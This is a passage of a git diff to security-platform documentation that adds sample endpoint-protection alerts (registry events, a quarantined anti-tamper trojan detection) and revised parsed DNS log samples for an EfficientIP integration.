"Blocked": false, + "UserDecision": false, + "SourceProcessKilled": false + }, + "Path": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements\\25000004", + "ValueName": "Element", + "ValueDataType": 3, + "ValueDataTypeComputedMap": "REG_BINARY", + "ValueData": [ + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0 + ] + }, + "AdditionalData": { + "AgentAddresses": [], + "AgentGroupGuid": "{61B578F4-289D-4B97-A331-DDDCB80C6427}", + "AgentGroupName": "Desktop", + "AgentGuid": "{6EF8564D-941A-4377-80FD-78CD3DFEB269}", + "AgentName": "DST-001", + "CategoryName": "Registry", + "IncidentGuid": null, + "Message": "The'svchost.exe'processcreatedtheregistryvalue'Element'", + "PolicyName": "Stormshield-Mediumpolicy-External", + "SeverityName": "Notice" + } + } + ``` + + + === "test_type_114" @@ -901,6 +1105,113 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_type_114_2" + + + ```json + { + "Version": 1, + "Type": 114, + "TypeComputedMap": "RegistryValueRead", + "Severity": 2, + "ServerReserved": 0, + "Attributes": 2, + "AttributesComputedBitMap": [ + "Protection" + ], + "EventGuid": "{002A9967-5EF2-40CF-911D-7DBA518843A9}", + "GenerateIncident": true, + "Timestamp": "2024-07-09T12:33:11.2491955+02:00", + "TimestampRaw": 133649947912491955, + "SpecificData": { + "SourceProcess": { + "PID": 3948, + "ProcessGuid": "{9BC994D7-904B-4C9C-8DC0-A03A36F36276}", + "ProcessImageName": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.24050.7-0\\MsMpEng.exe", + "VolumeZone": 1, + "VolumeZoneComputedBitMap": [ + "Operating system" + ], + "ProcessCommandLine": "\"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.24050.7-0\\MsMpEng.exe\"", + "User": "S-1-5-21-2222222-33333333-44444444-555", + "UserNameLookup": "JOHNDOE", + "UserDomainLookup": "TEST", + "IntegrityLevel": "S-1-16-16384", + "IntegrityLevelNameLookup": "Niveau obligatoire syst\u00e8me", + "IntegrityLevelDomainLookup": "\u00c9tiquette obligatoire", + "SessionID": 0, + "HashMd5": "4A4D6E95B693256BCD6E90FDC077194A", + "HashSha1": "2E52FBE255C0CB6C6B27EEE8C28ACAFAA42DB60E", + "HashSha256": "08D69BDE42AEEA0F0ECBF16A84BF74AF47C0EA6C0ADA6DDBD40CDC7F5C2930ED", + "IsProtectedOrCritical": true, + "CertificateSignatureState": 1, + "CertificateSignatureStateComputedMap": "SignatureStateTrusted", + "Certificates": [ + { + "Algorithm": "SHA256", + "IssuerCN": "Microsoft Windows Production PCA 2011", + "SubjectCN": "Microsoft Windows Publisher", + "SigningTime": "2024-05-11T03:15:15.5120000+02:00", + "ValidityStart": "2024-02-08T21:22:45.0000000+02:00", + "ValidityEnd": "2025-02-07T21:22:45.0000000+02:00" + } + ], + "ProcessStartTime": "2024-07-09T10:03:54.4154623+02:00", + "ProcessStartTimeRaw": 133649858344154623 + }, + "Action": { + "PolicyGuid": "{DDAB1006-337F-4B8C-8486-E5A9619144BB}", + "PolicyVersion": 14, + "RuleGuid": "{4FAC2120-288B-4B3C-9F77-2E5B6ECBB85E}", + "BaseRuleGuid": "{49A8528E-E749-4A9D-8736-2CF9380DE241}", + "IdentifierGuid": "{0B7EF8C7-FAE0-4890-981A-22FE12F22173}", + "Blocked": false, + "RequestMoveToQuarantine": false, + "UserDecision": false, + "SourceProcessKilled": false, + "RuleTags": [ + "T1562.001" + ] + }, + "Path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes", + "ValueName": "C:\\Program Files\\Stormshield\\SES Evolution\\Agent\\Bin\\EsInject.exe" + }, + "AdditionalData": { + "AgentAddresses": [ + "1.2.3.4" + ], + "AgentGroupGuid": "{8AD24A5D-0B19-45E2-9B28-F584F8A54CBC}", + "AgentGroupName": "Demo", + "AgentGuid": "{CC0772D7-8EBC-4EE6-9FC0-A8B26F5FA7FF}", + "AgentName": "WIN10-A", + "AttackCVEId": null, + "AttackMitreTacticId": [ + "TA0005" + ], + "AttackMitreTacticName": [ + "Defense Evasion" + ], + "AttackMitreTechnicId": [ + "T1562", + "T1562.001" + ], + "AttackMitreTechnicName": [ + "Impair Defenses", + "Disable or Modify Tools" + ], + "AttackSESId": null, + "AttackTriggerCondition": "An untrusted process attempts to add bypass into Windows Defender.", + "CategoryName": "Registry", + "IncidentGuid": "{DA0FA4D3-76B8-4EE0-A8B7-5AFDF9F80071}", + "Message": "The 'MsMpEng.exe' process read the registry value 'C:\\Program Files\\Stormshield\\SES Evolution\\Agent\\Bin\\EsInject.exe'", + "PolicyName": "Demo - Protect policy", + "SeverityName": "Critical" + } + } + ``` + + + === "test_type_115" @@ -2914,6 +3225,145 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_type_20048_1" + + + ```json + { + "Version": 1, + "Type": 20048, + "TypeComputedMap": "External", + "Severity": 4, + "ServerReserved": 0, + "Attributes": 32, + "AttributesComputedBitMap": [ + "External" + ], + "EventGuid": "{5838A063-4210-4268-ADB0-39FC5B55A212}", + "GenerateIncident": false, + "Timestamp": "2024-03-22T14:01:26.6589969+00:00", + "TimestampRaw": 133555896866589969, + "SpecificData": { + "Action": { + "PolicyGuid": "{DFDA0F76-10AF-4615-B093-7AA46CC2E7A3}", + "PolicyVersion": 5, + "RuleGuid": "{63B63F11-7C06-4555-9542-3F7E795B98EE}", + "BaseRuleGuid": "{9B076C45-6373-4A4E-9310-F139A66794B4}", + "IdentifierGuid": "{00000000-0000-0000-0000-000000000000}", + "Blocked": false, + "RequestMoveToQuarantine": false, + "UserDecision": false, + "SourceProcessKilled": false + }, + "Description": "localized:EventForwarding_WinDefender_MalwareProtectionStateMalwareActionTaken", + "OriginType": 2, + "ExtraData": { + "_SourceCategory": 0, + "_HideFromUsers": 1, + "_OriginalText": "2024 Mar 22 14:01:25 WinEvtLog: Microsoft-Windows-Windows Defender/Operational: INFORMATION(1117): Microsoft-Windows-Windows Defender: SYSTEM: NT AUTHORITY: DESKTOP-001: Microsoft Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software. For more information please see the following: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/BatTamper.A&threatid=2147818424&enterprise=0 \tName: Trojan:Win32/BatTamper.A \tID: 2147818424 \tSeverity: Severe \tCategory: Trojan \tPath: file:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1; webfile:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1|https://github.com/|pid:13760,ProcessStart:133555896788321048 \tDetection Origin: Internet \tDetection Type: Concrete \tDetection Source: Downloads and attachments \tUser: NT AUTHORITY\\SYSTEM \tProcess Name: Unknown \tAction: Quarantine \tAction Status: No additional actions required \tError Code: 0x00000000 \tError description: The operation completed successfully. \tSecurity intelligence Version: AV: 1.407.619.0, AS: 1.407.619.0, NIS: 1.407.619.0 \tEngine Version: AM: 1.1.24020.9, NIS: 1.1.24020.9", + "program_name": "WinEvtLog", + "_NormalizerNames": "syslog-1-date-fmt-4, syslog-1-solaris-progname-1", + "_NormalizerIds": "4, 6", + "_FileType": "windows", + "_ExtractorIds": "1", + "_ExtractorNames": "windows", + "_RuleDescription": "localized:EventForwarding_WinDefender_MalwareProtectionStateMalwareActionTaken", + "_RuleId": 13, + "_RuleImportedId": 24, + "_RuleKeywords": "windows-defender", + "_RuleLevel": 6, + "__EvtXml": { + "Event": { + "System": { + "Provider": { + "Name": "Microsoft-Windows-Windows Defender", + "Guid": "{11cd958a-c507-4ef3-b3f2-5fd9dfbd2c78}" + }, + "EventID": "1117", + "Version": "0", + "Level": "4", + "Task": "0", + "Opcode": "0", + "Keywords": "0x8000000000000000", + "TimeCreated": { + "SystemTime": "2024-03-22T14:01:25.6359716Z" + }, + "EventRecordID": "613", + "Correlation": {}, + "Execution": { + "ProcessID": "5384", + "ThreadID": "4576" + }, + "Channel": "Microsoft-Windows-Windows Defender/Operational", + "Computer": "DESKTOP-001", + "Security": { + "UserID": "S-1-5-18" + } + }, + "EventData": { + "Product Name": "Microsoft Defender Antivirus", + "Product Version": "4.18.23110.3", + "Detection ID": "{9C26ADFE-43AA-4884-9765-A2EC223DC7E0}", + "Detection Time": "2024-03-22T14:01:20.550Z", + "Threat ID": "2147818424", + "Threat Name": "Trojan:Win32/BatTamper.A", + "Severity ID": "5", + "Severity Name": "Severe", + "Category ID": "8", + "Category Name": "Trojan", + "FWLink": "https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/BatTamper.A&threatid=2147818424&enterprise=0", + "Status Code": "4", + "State": "2", + "Source ID": "4", + "Source Name": "Downloads and attachments", + "Process Name": "Unknown", + "Detection User": "DESKTOP-001\\Lab", + "Path": "file:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1; webfile:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1|https://github.com/|pid:13760,ProcessStart:133555896788321048", + "Origin ID": "4", + "Origin Name": "Internet", + "Execution ID": "0", + "Execution Name": "Unknown", + "Type ID": "0", + "Type Name": "Concrete", + "Pre Execution Status": "0", + "Action ID": "2", + "Action Name": "Quarantine", + "Error Code": "0x00000000", + "Error Description": "The operation completed successfully. ", + "Post Clean Status": "0", + "Additional Actions ID": "0", + "Additional Actions String": "No additional actions required", + "Remediation User": "NT AUTHORITY\\SYSTEM", + "Security intelligence Version": "AV: 1.407.619.0, AS: 1.407.619.0, NIS: 1.407.619.0", + "Engine Version": "AM: 1.1.24020.9, NIS: 1.1.24020.9" + } + } + } + }, + "Fields": { + "_RuleGuid": "{63B63F11-7C06-4555-9542-3F7E795B98EE}", + "_BaseRuleGuid": "{9B076C45-6373-4A4E-9310-F139A66794B4}" + } + }, + "AdditionalData": { + "AgentAddresses": [ + "192.168.0.1" + ], + "AgentGroupGuid": "{8C2850C0-1A73-4CBC-9831-5AA5D1438AF2}", + "AgentGroupName": "Desktop", + "AgentGuid": "{0E6DAED4-3505-4F96-9F8D-55FBC85CA4C7}", + "AgentName": "DESKTOP-001", + "CategoryName": "External", + "IncidentGuid": null, + "Message": "Windows Defender: The antimalware platform performed an action to protect your system from malware or other potentially unwanted software.", + "PolicyName": "Lab Policy", + "SeverityName": "Warning" + } + } + ``` + + + === "test_type_20049" diff --git a/_shared_content/operations_center/integrations/generated/f95fea50-533c-4897-9272-2f8361e63644.md b/_shared_content/operations_center/integrations/generated/f95fea50-533c-4897-9272-2f8361e63644.md index 1994aafd3c..eb0b004d79 100644 --- a/_shared_content/operations_center/integrations/generated/f95fea50-533c-4897-9272-2f8361e63644.md +++ b/_shared_content/operations_center/integrations/generated/f95fea50-533c-4897-9272-2f8361e63644.md @@ -25,14 +25,120 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. + +=== "dns_format_error.json" + + ```json + + { + "message": "DNS format error from 7507:2649:84be:353:95f9:eee1:65e9:44b4#53 resolving ejp.rlcdn.com/AAAA for 1.2.3.4#55198: Name rlcdn.com (SOA) not subdomain of zone ejp.rlcdn.com -- invalid response", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "outcome": "failure", + "reason": "Name rlcdn.com (SOA) not subdomain of zone ejp.rlcdn.com -- invalid response", + "type": [ + "info" + ] + }, + "client": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 55198 + }, + "dns": { + "question": { + "name": "ejp.rlcdn.com", + "registered_domain": "rlcdn.com", + "subdomain": "ejp", + "top_level_domain": "com", + "type": "AAAA" + }, + "type": "query" + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "hosts": [ + "ejp.rlcdn.com" + ], + "ip": [ + "1.2.3.4", + "7507:2649:84be:353:95f9:eee1:65e9:44b4" + ] + }, + "server": { + "ip": "7507:2649:84be:353:95f9:eee1:65e9:44b4", + "port": 53 + } + } + + ``` + + +=== "dns_formerr.json" + + ```json + + { + "message": "FORMERR resolving 'api.example.com/AAAA/IN': 1111:2222:3333:4444::1#53", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "outcome": "failure", + "type": [ + "info" + ] + }, + "dns": { + "question": { + "class": "IN", + "name": "api.example.com", + "registered_domain": "example.com", + "subdomain": "api", + "top_level_domain": "com", + "type": "AAAA" + }, + "type": "query" + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "hosts": [ + "api.example.com" + ], + "ip": [ + "1111:2222:3333:4444::1" + ] + }, + "server": { + "ip": "1111:2222:3333:4444::1", + "port": 53 + } + } + + ``` + === "dns_guardian_answer1.json" ```json { - "message": "Nov 6 13:43:39 doh-2eu-guardian named[74943]: client 10.242.101.27#46671 (meet.google.com.): answer: meet.google.com. IN TYPE65 (10.242.101.187) -> NOERROR", + "message": "client 10.242.101.27#46671 (meet.google.com.): answer: meet.google.com. IN TYPE65 (10.242.101.187) -> NOERROR", "event": { "category": [ "network" @@ -42,13 +148,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-11-06T13:43:39Z", "client": { "address": "10.242.101.27", - "ip": "10.242.101.27" + "ip": "10.242.101.27", + "port": 46671 }, "dns": { - "header_flags": [], "question": { "class": "IN", "name": "meet.google.com.", @@ -60,9 +165,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "response_code": "NOERROR", "type": "answer" }, - "host": { - "name": "doh-2eu-guardian" - }, "network": { "transport": "udp" }, @@ -80,9 +182,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "server": { "ip": "10.242.101.187" - }, - "source": { - "port": 46671 } } @@ -94,7 +193,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "Nov 6 13:44:56 doh-2eu-guardian named[74943]: client 10.242.101.27#34229 (community.efficientip.com.): answer: community.efficientip.com. IN A (10.242.101.187) -> NOERROR 474 CNAME eip-community.hosted-by-discourse.com. 174 A 184.104.178.47", + "message": "client 10.242.101.27#34229 (community.efficientip.com.): answer: community.efficientip.com. IN A (10.242.101.187) -> NOERROR 474 CNAME eip-community.hosted-by-discourse.com. 174 A 184.104.178.47", "event": { "category": [ "network" @@ -104,10 +203,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-11-06T13:44:56Z", "client": { "address": "10.242.101.27", - "ip": "10.242.101.27" + "ip": "10.242.101.27", + "port": 34229 }, "dns": { "answers": [ @@ -122,7 +221,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "type": "A" } ], - "header_flags": [], "question": { "class": "IN", "name": "community.efficientip.com.", @@ -134,9 +232,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "response_code": "NOERROR", "type": "answer" }, - "host": { - "name": "doh-2eu-guardian" - }, "network": { "transport": "udp" }, @@ -154,9 +249,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "server": { "ip": "10.242.101.187" - }, - "source": { - "port": 34229 } } @@ -168,7 +260,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "Oct 3 18:23:27 doh-2eu-guardian named[74943]: ARMING trigger on 37.169.153.147.f6:ec:1e:e3:7a:b1.ei6pt (action:QUARANTINE) (Suspicious Behavior)", + "message": "ARMING trigger on 37.169.153.147.f6:ec:1e:e3:7a:b1.ei6pt (action:QUARANTINE) (Suspicious Behavior)", "event": { "action": "quarantine", "category": [ @@ -179,7 +271,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-10-03T18:23:27Z", "client": { "address": "37.169.153.147", "ip": "37.169.153.147" @@ -188,9 +279,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "guardian_action": "arming", "guardian_trigger_name": "Suspicious Behavior" }, - "host": { - "name": "doh-2eu-guardian" - }, "observer": { "vendor": "EfficientIp" }, @@ -209,7 +297,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "Oct 3 18:24:28 doh-2eu-guardian named[74943]: DISARMING trigger on 37.169.153.147.f6:ec:1e:e3:7a:b1.ei6pt (action:QUARANTINE) (Suspicious Behavior)", + "message": "DISARMING trigger on 37.169.153.147.f6:ec:1e:e3:7a:b1.ei6pt (action:QUARANTINE) (Suspicious Behavior)", "event": { "action": "quarantine", "category": [ @@ -220,7 +308,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-10-03T18:24:28Z", "client": { "address": "37.169.153.147", "ip": "37.169.153.147" @@ -229,9 +316,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "guardian_action": "disarming", "guardian_trigger_name": "Suspicious Behavior" }, - "host": { - "name": "doh-2eu-guardian" - }, "observer": { "vendor": "EfficientIp" }, @@ -245,12 +329,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "dns_guardian_query1.json" +=== "dns_guardian_listlog.json" ```json { - "message": "Nov 6 13:43:39 doh-2eu-guardian named[74943]: client 10.242.101.27#46671: query: meet.google.com IN TYPE65 (10.242.101.187)", + "message": "List Matched 192.168.1.226#32622: query: www.combatcorner.com IN A (192.168.1.209) {DTP} [phishing,active30]", "event": { "category": [ "network" @@ -260,25 +344,30 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-11-06T13:43:39Z", "client": { - "address": "10.242.101.27", - "ip": "10.242.101.27" + "address": "192.168.1.226", + "ip": "192.168.1.226", + "port": 32622 }, "dns": { - "header_flags": [], "question": { "class": "IN", - "name": "meet.google.com", - "registered_domain": "google.com", - "subdomain": "meet", + "name": "www.combatcorner.com", + "registered_domain": "combatcorner.com", + "subdomain": "www", "top_level_domain": "com", - "type": "TYPE65" + "type": "A" }, "type": "query" }, - "host": { - "name": "doh-2eu-guardian" + "efficientip": { + "list_names": [ + "DTP" + ], + "tag_names": [ + "active30", + "phishing" + ] }, "network": { "transport": "udp" @@ -288,30 +377,27 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "meet.google.com" + "www.combatcorner.com" ], "ip": [ - "10.242.101.187", - "10.242.101.27" + "192.168.1.209", + "192.168.1.226" ] }, "server": { - "ip": "10.242.101.187" - }, - "source": { - "port": 46671 + "ip": "192.168.1.209" } } ``` -=== "dns_guardian_query2.json" +=== "dns_guardian_listlog2.json" ```json { - "message": "Nov 6 13:44:56 doh-2eu-guardian named[74943]: client 10.242.101.27#34229: query: community.efficientip.com IN A (10.242.101.187)", + "message": "List Matched 192.168.1.226#46937: query: www.dsmqlkdsq.com IN A (192.168.1.209) {DTP,internal_clients}", "event": { "category": [ "network" @@ -321,25 +407,27 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-11-06T13:44:56Z", "client": { - "address": "10.242.101.27", - "ip": "10.242.101.27" + "address": "192.168.1.226", + "ip": "192.168.1.226", + "port": 46937 }, "dns": { - "header_flags": [], "question": { "class": "IN", - "name": "community.efficientip.com", - "registered_domain": "efficientip.com", - "subdomain": "community", + "name": "www.dsmqlkdsq.com", + "registered_domain": "dsmqlkdsq.com", + "subdomain": "www", "top_level_domain": "com", "type": "A" }, "type": "query" }, - "host": { - "name": "doh-2eu-guardian" + "efficientip": { + "list_names": [ + "DTP", + "internal_clients" + ] }, "network": { "transport": "udp" @@ -349,30 +437,27 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "community.efficientip.com" + "www.dsmqlkdsq.com" ], "ip": [ - "10.242.101.187", - "10.242.101.27" + "192.168.1.209", + "192.168.1.226" ] }, "server": { - "ip": "10.242.101.187" - }, - "source": { - "port": 34229 + "ip": "192.168.1.209" } } ``` -=== "dns_named_query.json" +=== "dns_guardian_query1.json" ```json { - "message": "Nov 6 14:06:24 0dl10sds named[14006]: client @0x7ee2b158 10.0.142.4#39897 (www.google.com): query: www.google.com IN A +E(0)K (10.0.142.2)", + "message": "client 10.242.101.27#46671: query: meet.google.com IN TYPE65 (10.242.101.187)", "event": { "category": [ "network" @@ -382,28 +467,22 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-11-06T14:06:24Z", "client": { - "address": "10.0.142.4", - "ip": "10.0.142.4" + "address": "10.242.101.27", + "ip": "10.242.101.27", + "port": 46671 }, "dns": { - "header_flags": [ - "RD" - ], "question": { "class": "IN", - "name": "www.google.com", + "name": "meet.google.com", "registered_domain": "google.com", - "subdomain": "www", + "subdomain": "meet", "top_level_domain": "com", - "type": "A" + "type": "TYPE65" }, "type": "query" }, - "host": { - "name": "0dl10sds" - }, "network": { "transport": "udp" }, @@ -412,30 +491,27 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "www.google.com" + "meet.google.com" ], "ip": [ - "10.0.142.2", - "10.0.142.4" + "10.242.101.187", + "10.242.101.27" ] }, "server": { - "ip": "10.0.142.2" - }, - "source": { - "port": 39897 + "ip": "10.242.101.187" } } ``` -=== "dns_named_query_cd.json" +=== "dns_guardian_query2.json" ```json { - "message": "Nov 6 14:08:18 0dl10sds named[14006]: client @0x7a4f3158 10.0.142.4#36506 (www.google.com): query: www.google.com IN A +E(0)CK (10.0.142.2)", + "message": "client 10.242.101.27#34229: query: community.efficientip.com IN A (10.242.101.187)", "event": { "category": [ "network" @@ -445,29 +521,22 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-11-06T14:08:18Z", "client": { - "address": "10.0.142.4", - "ip": "10.0.142.4" + "address": "10.242.101.27", + "ip": "10.242.101.27", + "port": 34229 }, "dns": { - "header_flags": [ - "CD", - "RD" - ], "question": { "class": "IN", - "name": "www.google.com", - "registered_domain": "google.com", - "subdomain": "www", + "name": "community.efficientip.com", + "registered_domain": "efficientip.com", + "subdomain": "community", "top_level_domain": "com", "type": "A" }, "type": "query" }, - "host": { - "name": "0dl10sds" - }, "network": { "transport": "udp" }, @@ -476,30 +545,27 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "www.google.com" + "community.efficientip.com" ], "ip": [ - "10.0.142.2", - "10.0.142.4" + "10.242.101.187", + "10.242.101.27" ] }, "server": { - "ip": "10.0.142.2" - }, - "source": { - "port": 36506 + "ip": "10.242.101.187" } } ``` -=== "dns_named_query_dnssec.json" +=== "dns_https_record.json" ```json { - "message": "Nov 6 14:09:07 0dl10sds named[14006]: client @0x81a97158 10.0.142.4#49968 (www.google.com): query: www.google.com IN A +E(0)DK (10.0.142.2)", + "message": "26914:client 1.2.3.4#52283 (cdnjs.cloudflare.com.): answer: cdnjs.cloudflare.com. IN TYPE65 (5.6.7.8) -> NOERROR 205 HTTPS 1 . alpn=h3,h2 ipv4hint=104.17.24.14,104.17.25.14 ipv6hint=2606:4700::6811:180e,2606:4700::6811:190e 205 RRSIG HTTPS 13", "event": { "category": [ "network" @@ -509,27 +575,34 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-11-06T14:09:07Z", "client": { - "address": "10.0.142.4", - "ip": "10.0.142.4" + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 52283 }, "dns": { - "header_flags": [ - "RD" + "answers": [ + { + "data": "alpn=h3,h2 ipv4hint=104.17.24.14,104.17.25.14 ipv6hint=2606:4700::6811:180e,2606:4700::6811:190e", + "ttl": 205, + "type": "HTTPS" + }, + { + "data": "HTTPS", + "ttl": 205, + "type": "RSSIG" + } ], "question": { "class": "IN", - "name": "www.google.com", - "registered_domain": "google.com", - "subdomain": "www", + "name": "cdnjs.cloudflare.com.", + "registered_domain": "cloudflare.com", + "subdomain": "cdnjs", "top_level_domain": "com", - "type": "A" + "type": "TYPE65" }, - "type": "query" - }, - "host": { - "name": "0dl10sds" + "response_code": "NOERROR", + "type": "answer" }, "network": { "transport": "udp" @@ -539,30 +612,27 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "www.google.com" + "cdnjs.cloudflare.com." ], "ip": [ - "10.0.142.2", - "10.0.142.4" + "1.2.3.4", + "5.6.7.8" ] }, "server": { - "ip": "10.0.142.2" - }, - "source": { - "port": 49968 + "ip": "5.6.7.8" } } ``` -=== "dns_named_query_tcp.json" +=== "dns_named_query.json" ```json { - "message": "Nov 6 14:04:34 0dl10sds named[14006]: client @0x7a532158 10.0.142.4#36995 (www.google.com): query: www.google.com IN A +E(0)TK (10.0.142.2)", + "message": "client @0x7ee2b158 10.0.142.4#39897 (www.google.com): query: www.google.com IN A +E(0)K (10.0.142.2)", "event": { "category": [ "network" @@ -572,10 +642,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-11-06T14:04:34Z", "client": { "address": "10.0.142.4", - "ip": "10.0.142.4" + "ip": "10.0.142.4", + "port": 39897 }, "dns": { "header_flags": [ @@ -591,11 +661,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "type": "query" }, - "host": { - "name": "0dl10sds" - }, "network": { - "transport": "tcp" + "transport": "udp" }, "observer": { "vendor": "EfficientIp" @@ -611,9 +678,704 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "server": { "ip": "10.0.142.2" + } + } + + ``` + + +=== "dns_named_query_1.json" + + ```json + + { + "message": "client @0x7ee2b158 1.2.3.4#50426: updating zone 'test.fr/IN': deleting rrset at 'test.test.fr' AAAA", + "event": { + "action": "deleting", + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "reason": "rrset at 'test.test.fr' AAAA", + "type": [ + "info" + ] }, - "source": { - "port": 36995 + "client": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 50426 + }, + "dns": { + "type": "query" + }, + "efficientip": { + "rpz": { + "domain": "test.fr", + "query": { + "class": "IN" + } + } + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + } + } + + ``` + + +=== "dns_named_query_2.json" + + ```json + + { + "message": "client 1.2.3.4#63572 (app.test.com.): answer: app.test.com. IN A (1.2.3.4) -> NOERROR 300 A 1.2.3.4 300 A 1.2.3.4 300 RRSIG A 13 3 300 20240815085545 20240813065545 34505 test.com. xxxxxxxxxxxxx", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "type": [ + "info" + ] + }, + "client": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 63572 + }, + "dns": { + "answers": [ + { + "data": "1.2.3.4", + "ttl": 300, + "type": "A" + }, + { + "data": "1.2.3.4", + "ttl": 300, + "type": "A" + }, + { + "data": "HTTPS", + "ttl": 300, + "type": "RSSIG" + } + ], + "question": { + "class": "IN", + "name": "app.test.com.", + "registered_domain": "test.com", + "subdomain": "app", + "top_level_domain": "com", + "type": "A" + }, + "response_code": "NOERROR", + "type": "answer" + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "hosts": [ + "app.test.com." + ], + "ip": [ + "1.2.3.4" + ] + }, + "server": { + "ip": "1.2.3.4" + } + } + + ``` + + +=== "dns_named_query_cd.json" + + ```json + + { + "message": "client @0x7a4f3158 10.0.142.4#36506 (www.google.com): query: www.google.com IN A +E(0)CK (10.0.142.2)", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "type": [ + "info" + ] + }, + "client": { + "address": "10.0.142.4", + "ip": "10.0.142.4", + "port": 36506 + }, + "dns": { + "header_flags": [ + "CD", + "RD" + ], + "question": { + "class": "IN", + "name": "www.google.com", + "registered_domain": "google.com", + "subdomain": "www", + "top_level_domain": "com", + "type": "A" + }, + "type": "query" + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "hosts": [ + "www.google.com" + ], + "ip": [ + "10.0.142.2", + "10.0.142.4" + ] + }, + "server": { + "ip": "10.0.142.2" + } + } + + ``` + + +=== "dns_named_query_dnssec.json" + + ```json + + { + "message": "client @0x81a97158 10.0.142.4#49968 (www.google.com): query: www.google.com IN A +E(0)DK (10.0.142.2)", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "type": [ + "info" + ] + }, + "client": { + "address": "10.0.142.4", + "ip": "10.0.142.4", + "port": 49968 + }, + "dns": { + "header_flags": [ + "RD" + ], + "question": { + "class": "IN", + "name": "www.google.com", + "registered_domain": "google.com", + "subdomain": "www", + "top_level_domain": "com", + "type": "A" + }, + "type": "query" + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "hosts": [ + "www.google.com" + ], + "ip": [ + "10.0.142.2", + "10.0.142.4" + ] + }, + "server": { + "ip": "10.0.142.2" + } + } + + ``` + + +=== "dns_named_query_tcp.json" + + ```json + + { + "message": "client @0x7a532158 10.0.142.4#36995 (www.google.com): query: www.google.com IN A +E(0)TK (10.0.142.2)", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "type": [ + "info" + ] + }, + "client": { + "address": 